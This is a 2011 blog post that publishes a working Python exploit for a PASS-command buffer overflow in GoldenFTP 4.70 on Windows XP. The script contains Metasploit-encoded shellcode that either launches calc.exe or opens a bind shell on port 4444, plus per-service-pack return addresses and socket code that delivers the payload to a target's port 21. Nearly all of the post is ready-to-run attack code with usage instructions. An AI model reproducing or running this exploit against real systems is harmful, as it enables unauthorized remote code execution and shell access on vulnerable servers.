Friday, July 8, 2011

Revised V2.5 Golden FTP 4.70 PASS overflow exploit


#!/usr/bin/python
#
###########################################################################
## Exploit Title: Revised V2.5: GoldenFTP 4.70 PASS overflow exploit
## Exploit Version: 2.5, 2011-07-08 15:00
## Date: July 8, 2011 (20110708-1500)
## Author: Joff Thyer (jsthyer@gmail.com)
## Software Link: http://www.goldenftpserver.com/
## Version: 4.70
## Tested on: WinXP-SP0/SP2/SP3
## CVE: 2006-6576
##
## based on exploit by:
##   Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
##
## NOTES:
## (1) You must make sure that the "Show new connections" option is enabled
## in order for this exploit to work.
## (2) Specifying the IP source address is important as it is used in the
## calculation of the overflow buffer offset.
###########################################################################
#


import socket
import sys
from subprocess import Popen, PIPE
import re
import time


# Metasploit
# ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3
# 281 bytes
calc = \
"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\
"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\
"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\
"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\
"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\
"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\
"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\
"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\
"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\
"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\
"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\
"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\
"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\
"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\
"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\
"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\
"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\
"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\
"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\
"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\
"\x88"


# Metasploit
# ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3
# 422 bytes
cmdshell = \
"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\
"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\
"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\
"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\
"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\
"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\
"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\
"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\
"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\
"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\
"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\
"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\
"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\
"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\
"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\
"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\
"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\
"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\
"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\
"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\
"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\
"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\
"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\
"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\
"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\
"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\
"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\
"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\
"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\
"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\
"\x8c\xc7"


if len(sys.argv) < 5:
     print "[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % sys.argv[0]
     print "\tshellcode = (calc|shell)"
     print "\tplatform = (sp0|sp2|sp3)"
     print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"
     sys.exit(0)


srcaddr = sys.argv[1]
target = sys.argv[2]
shellcode = sys.argv[3]
platform = sys.argv[4]


# which payload?
buf = calc
if shellcode == "calc":
     buf = calc
elif shellcode == "shell":
     buf = cmdshell


# address of JMP ESI in Kernel32.dll
if platform == "sp0":
     jmpesi = "\x7b\x15\xe8\x77"
elif platform == "sp2":
     jmpesi = "\xc3\x72\x85\x7c"
elif platform == "sp3":
     jmpesi = "\x0b\xda\x82\x7c"


shortjmp = "\x90\x90\x90\x90\xeb\x20\n"
nopsled = "\x90" * 60
padding = "A" * (533 - len(srcaddr + buf + nopsled))
payload = nopsled + buf + padding + jmpesi


print "\
[+] Golden FTP PASS Exploit\n\
[+] Version 2.5, July 8 2011\n\
[+] Author: Joff Thyer (jsthyer@gmail.com)\n\
[+] 'Show new connections' must be enabled in GoldenFTP in order\n\
[+] for this exploit to succeed!\n\
[+] Connecting: "+target


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,21))
except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)


print "[+] Sending payload, length = " + `len(payload)`
s.send(shortjmp);
s.send("USER anonymous\n")
s.send("PASS " + payload + "\n")
s.recv(1024)
print "[+] Sleeping 2 secs..."
time.sleep(2)
s.close()


if shellcode == "shell" and srcaddr == target:
     p = Popen(["netstat","-na"],stdout=PIPE,shell=False)
     netstat = p.stdout.read()
     shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat)
     if shellok:
          print "[+] "+shellok.group(0)


print "[+] Done."
sys.exit(0)





2 comments:

Unisung said...

Hi

Unisung said...
This comment has been removed by the author.